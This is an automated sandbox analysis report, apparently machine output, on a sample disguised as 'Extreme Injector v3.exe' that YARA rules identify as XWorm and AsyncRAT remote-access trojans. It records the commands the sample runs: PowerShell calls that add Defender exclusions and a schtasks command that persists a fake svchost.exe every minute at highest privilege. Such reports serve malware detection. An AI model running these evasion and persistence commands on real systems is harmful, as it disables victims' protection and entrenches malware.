                      Source: powershell.exe, 00000001.00000002.1722348335.000001B2A1019000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1783319483.0000012E621F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1917701450.000001C0DC709000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2076420987.00000165426F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                      Source: Extreme Injector v3.exe, 00000000.00000002.2923795440.0000000002639000.00000004.00000800.00020000.00000000.sdmp, Extreme Injector v3.exe, 00000000.00000002.2923795440.0000000002591000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1722348335.000001B2A0DF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1783319483.0000012E61FD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1917701450.000001C0DC4E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2076420987.00000165424D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 00000001.00000002.1722348335.000001B2A1019000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1783319483.0000012E621F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1917701450.000001C0DC709000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2076420987.00000165426F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                      Source: powershell.exe, 0000000B.00000002.2076420987.00000165426F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: powershell.exe, 00000007.00000002.2031373620.000001C0F4863000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.micom/pki/certs/Miut_2010-06-23.cr
                      Source: powershell.exe, 0000000B.00000002.2293488165.000001655A8B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                      Source: powershell.exe, 00000001.00000002.1722348335.000001B2A0DF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1783319483.0000012E61FD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1917701450.000001C0DC4E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2076420987.00000165424D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                      Source: powershell.exe, 0000000B.00000002.2256933254.0000016552542000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 0000000B.00000002.2256933254.0000016552542000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 0000000B.00000002.2256933254.0000016552542000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: powershell.exe, 0000000B.00000002.2076420987.00000165426F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: powershell.exe, 00000001.00000002.1746315456.000001B2B0E64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1854477434.0000012E72044000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2014105281.000001C0EC554000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2256933254.0000016552542000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

                      Operating System Destruction

                      barindex
                      Protects its processes via BreakOnTermination flag
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess information set: 01 00 00 00 Jump to behavior

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: Extreme Injector v3.exe, type: SAMPLEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                      Source: Extreme Injector v3.exe, type: SAMPLEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 0.0.Extreme Injector v3.exe.360000.0.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                      Source: 0.0.Extreme Injector v3.exe.360000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 0.2.Extreme Injector v3.exe.265f8b0.0.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                      Source: 0.2.Extreme Injector v3.exe.265f8b0.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 0.2.Extreme Injector v3.exe.265f8b0.0.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                      Source: 0.2.Extreme Injector v3.exe.265f8b0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 00000000.00000002.2923795440.0000000002652000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 00000000.00000000.1645308645.0000000000362000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPEDMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                      Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeCode function: 0_2_00007FFD9B8960260_2_00007FFD9B896026
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeCode function: 0_2_00007FFD9B896DD20_2_00007FFD9B896DD2
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeCode function: 0_2_00007FFD9B8922F10_2_00007FFD9B8922F1
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeCode function: 0_2_00007FFD9B8916D90_2_00007FFD9B8916D9
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeCode function: 0_2_00007FFD9B8913FB0_2_00007FFD9B8913FB
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeCode function: 0_2_00007FFD9B8920590_2_00007FFD9B892059
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B89947D1_2_00007FFD9B89947D
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B8A206D4_2_00007FFD9B8A206D
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B9739D14_2_00007FFD9B9739D1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B972E114_2_00007FFD9B972E11
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9B8913DD7_2_00007FFD9B8913DD
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9B8920787_2_00007FFD9B892078
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9B9630E97_2_00007FFD9B9630E9
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B8921FA11_2_00007FFD9B8921FA
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B9630E911_2_00007FFD9B9630E9
                      Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 15_2_00007FFD9B8916D915_2_00007FFD9B8916D9
                      Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 15_2_00007FFD9B890FF815_2_00007FFD9B890FF8
                      Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 15_2_00007FFD9B89205915_2_00007FFD9B892059
                      Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 16_2_00007FFD9B8A16D916_2_00007FFD9B8A16D9
                      Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 16_2_00007FFD9B8A0FF816_2_00007FFD9B8A0FF8
                      Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 16_2_00007FFD9B8A205916_2_00007FFD9B8A2059
                      Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 18_2_00007FFD9B8916D918_2_00007FFD9B8916D9
                      Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 18_2_00007FFD9B890FF818_2_00007FFD9B890FF8
                      Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 18_2_00007FFD9B89205918_2_00007FFD9B892059
                      Source: Extreme Injector v3.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: Extreme Injector v3.exe, type: SAMPLEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                      Source: Extreme Injector v3.exe, type: SAMPLEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 0.0.Extreme Injector v3.exe.360000.0.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                      Source: 0.0.Extreme Injector v3.exe.360000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 0.2.Extreme Injector v3.exe.265f8b0.0.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                      Source: 0.2.Extreme Injector v3.exe.265f8b0.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 0.2.Extreme Injector v3.exe.265f8b0.0.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                      Source: 0.2.Extreme Injector v3.exe.265f8b0.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 00000000.00000002.2923795440.0000000002652000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 00000000.00000000.1645308645.0000000000362000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPEDMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                      Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: Extreme Injector v3.exe, 5IcfDKxoD0ObcBTJs0Kr7rM0Ud9ZJ.csCryptographic APIs: 'TransformFinalBlock'
                      Source: Extreme Injector v3.exe, 5IcfDKxoD0ObcBTJs0Kr7rM0Ud9ZJ.csCryptographic APIs: 'TransformFinalBlock'
                      Source: Extreme Injector v3.exe, URBrdZkGMwzi2hbgw0arbLTlF7INR.csCryptographic APIs: 'TransformFinalBlock'
                      Source: svchost.exe.0.dr, 5IcfDKxoD0ObcBTJs0Kr7rM0Ud9ZJ.csCryptographic APIs: 'TransformFinalBlock'
                      Source: svchost.exe.0.dr, 5IcfDKxoD0ObcBTJs0Kr7rM0Ud9ZJ.csCryptographic APIs: 'TransformFinalBlock'
                      Source: svchost.exe.0.dr, URBrdZkGMwzi2hbgw0arbLTlF7INR.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Extreme Injector v3.exe.265f8b0.0.raw.unpack, 5IcfDKxoD0ObcBTJs0Kr7rM0Ud9ZJ.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Extreme Injector v3.exe.265f8b0.0.raw.unpack, 5IcfDKxoD0ObcBTJs0Kr7rM0Ud9ZJ.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Extreme Injector v3.exe.265f8b0.0.raw.unpack, URBrdZkGMwzi2hbgw0arbLTlF7INR.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Extreme Injector v3.exe.265f8b0.0.raw.unpack, 3PBEeO1MD7801VZTmLM4yToFRXenF.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: 0.2.Extreme Injector v3.exe.265f8b0.0.raw.unpack, 3PBEeO1MD7801VZTmLM4yToFRXenF.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: Extreme Injector v3.exe, 3PBEeO1MD7801VZTmLM4yToFRXenF.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: Extreme Injector v3.exe, 3PBEeO1MD7801VZTmLM4yToFRXenF.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: svchost.exe.0.dr, 3PBEeO1MD7801VZTmLM4yToFRXenF.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: svchost.exe.0.dr, 3PBEeO1MD7801VZTmLM4yToFRXenF.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: classification engineClassification label: mal100.troj.evad.winEXE@20/20@2/2
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeFile created: C:\Users\user\AppData\Roaming\svchost.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\svchost.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7792:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7528:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8092:120:WilError_03
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeMutant created: \Sessions\1\BaseNamedObjects\264q6Z2c7trpM79g
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7632:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2836:120:WilError_03
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_apexu05t.db5.ps1Jump to behavior
                      Source: Extreme Injector v3.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: Extreme Injector v3.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: Extreme Injector v3.exeReversingLabs: Detection: 78%
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeFile read: C:\Users\user\Desktop\Extreme Injector v3.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\Extreme Injector v3.exe "C:\Users\user\Desktop\Extreme Injector v3.exe"
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Extreme Injector v3.exe'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Extreme Injector v3.exe'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe"
                      Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\svchost.exe C:\Users\user\AppData\Roaming\svchost.exe
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\svchost.exe C:\Users\user\AppData\Roaming\svchost.exe
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Extreme Injector v3.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Extreme Injector v3.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeSection loaded: linkinfo.dllJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeSection loaded: ntshrui.dllJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeSection loaded: cscapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeSection loaded: avicap32.dllJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeSection loaded: msvfw32.dllJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
